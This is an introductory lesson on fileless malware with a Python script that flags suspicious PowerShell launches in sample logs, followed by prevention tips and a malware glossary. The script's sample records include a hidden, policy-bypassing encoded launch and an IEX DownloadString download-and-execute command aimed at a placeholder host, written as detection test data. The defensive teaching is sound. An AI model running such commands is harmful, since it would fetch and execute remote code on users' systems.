Fileless Malware
It seems like nothing else could go wrong with this computer. If this was a game of malware bingo, you would be one step away from winning the jackpot. For fun, you investigate some command-line programs to see if they’ve been altered. Aaaand, did someone say bingo?
Fileless malware is a type of malware that ‘lives off the land’ and uses legitimate tools and the user’s operating system to perform malicious activities like privilege escalation, data collection, and more. It’s incredibly hard to detect and almost always missed by antivirus software.
Unlike a Trojan Horse, fileless malware does not pretend to be legitimate software; it actually is part of legitimate software. Fileless malware hides within the code of legitimate software, often altering existing code to make it malicious.
Certain programs, like Microsoft PowerShell, are particularly vulnerable to these attacks. Someone could use this attack vector to gather data, use your device's resources to mine cryptocurrency, or even install other malware.
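Because fileless malware runs through trusted, built-in tools such as PowerShell, defenders typically look at how those tools are invoked rather than scanning files on disk. The following script is an added example (not part of the original lesson) that scores constructed process-creation records for common "living off the land" indicators: an encoded command, a hidden window, a bypassed execution policy, a download-and-execute pattern, and PowerShell being launched by an Office application (the macro route). The log format (timestamp|parent|command line), the indicator list, and the weights are assumptions chosen for illustration, not a published detection standard.

```python
import re
from dataclasses import dataclass, field

# Heuristic indicators defenders commonly watch for in PowerShell command lines.
# Each entry: (pattern, weight, human-readable reason). Weights are assumed
# values for this example, not a standard scoring scheme.
INDICATORS = [
    (re.compile(r"-e(nc(odedcommand)?)?\b", re.I), 3, "base64-encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), 1, "user profile skipped"),
    (re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 2, "execution policy bypassed"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 3, "download cradle"),
    (re.compile(r"\biex\b|invoke-expression", re.I), 2, "dynamic code execution"),
]

# Office applications launching a shell is a classic sign of a malicious macro.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


@dataclass
class Finding:
    line_no: int
    score: int
    reasons: list[str] = field(default_factory=list)


def score_command(parent: str, cmdline: str) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation record.

    Only PowerShell launches are scored; anything else returns (0, []).
    """
    lowered = cmdline.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return 0, []
    score, reasons = 0, []
    for pattern, weight, why in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(why)
    if parent.lower() in SUSPICIOUS_PARENTS:
        score += 3
        reasons.append(f"spawned by Office application {parent}")
    return score, reasons


def scan(log_text: str, threshold: int = 4) -> list[Finding]:
    """Scan 'timestamp|parent|command line' records; report those at or above threshold."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        try:
            # maxsplit=2 keeps pipes that appear inside the command line itself
            _ts, parent, cmdline = line.split("|", 2)
        except ValueError:
            continue  # malformed record: skip it rather than crash the scan
        score, reasons = score_command(parent.strip(), cmdline.strip())
        if score >= threshold:
            findings.append(Finding(n, score, reasons))
    return findings


# Constructed sample records (assumed format), not real telemetry.
# Line 1 and 3 are benign admin use; lines 2 and 4 carry several indicators.
SAMPLE_LOG = """\
2024-01-01T09:00:01|explorer.exe|powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1
2024-01-01T09:05:12|winword.exe|powershell.exe -w hidden -nop -ep bypass -enc BASE64PLACEHOLDER
2024-01-01T09:07:40|cmd.exe|powershell.exe -Command "Get-Process | Sort-Object CPU"
2024-01-01T09:10:03|svchost.exe|powershell.exe -NoP -W Hidden -C "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"record {f.line_no}: score {f.score} -> {', '.join(f.reasons)}")
```

Running the script flags records 2 and 4 and leaves the two ordinary administrative invocations alone. The point of the weighting is that no single indicator is conclusive (scripts legitimately use `-NoProfile`, for example); it is the combination, especially together with an unusual parent process, that stands out. In a real environment these records would come from process-creation auditing or PowerShell script block logging rather than a hard-coded string.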
Your Suggestion
- Did you download that antivirus yet? Still avoiding those suspicious links?
- Disable command-line applications and macros not in use on the device.
- Keep your applications and system up to date for the latest security updates.
- Reboot the computer.
Review
What a day! On that horrible machine, you discovered:
- Malware: Malicious code inserted into a system to cause damage or gain unauthorized access to a network
- Adware: Unwanted software designed to throw advertisements on your screen
- Virus: A malicious self-replicating application that attaches itself to other programs and executables without the permission of the user
- Worm: Self-replicating code that copies itself from computer to computer without user intervention
- Spyware: Malicious code downloaded without a user’s authorization which is then used to steal sensitive information and relay it to an outside party in a way that harms the original user
- Trojan Horse: A type of contained, non-replicating malware that disguises itself as legitimate software in order to allow scammers and hackers access to a user’s system
- Rootkit: A collection of malicious programs that secretly provide continued, privileged access to a system for an unauthorized user
- Ransomware: Malicious code that will block a user’s access to data or threaten to publish sensitive data until they pay money to the malicious actor
- Fileless Malware: A type of malware that ‘lives off the land’ and uses legitimate tools and the user’s operating system to perform malicious activities like privilege escalation, data collection, and more. It’s incredibly hard to detect and almost always missed by antivirus software